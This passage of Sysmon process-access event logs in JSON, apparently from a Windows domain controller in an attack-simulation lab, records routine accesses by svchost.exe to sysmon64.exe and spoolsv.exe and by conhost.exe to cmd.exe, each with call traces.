05:48:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3654,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.733\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.733","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3655,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.733\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.733","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3656,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.733\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.733","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3657,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.733\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-023D-5F25-0000-0010256A0500}\r\nTargetProcessId: 4848\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.733","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-023D-5F25-0000-0010256A0500}","TargetProcessId":"4848","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3658,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:46.061\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001076B50200}\r\nTargetProcessId: 2440\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:46.061","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001076B50200}","TargetProcessId":"2440","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3659,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:46.061\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001076B50200}\r\nTargetProcessId: 2440\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:46.061","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001076B50200}","TargetProcessId":"2440","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3660,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:46.061\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001076B50200}\r\nTargetProcessId: 2440\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:46.061","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001076B50200}","TargetProcessId":"2440","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3661,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:46.061\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001076B50200}\r\nTargetProcessId: 2440\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+6988|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:46.061","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001076B50200}","TargetProcessId":"2440","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+6988|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3662,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:46.061\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001076B50200}\r\nTargetProcessId: 2440\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 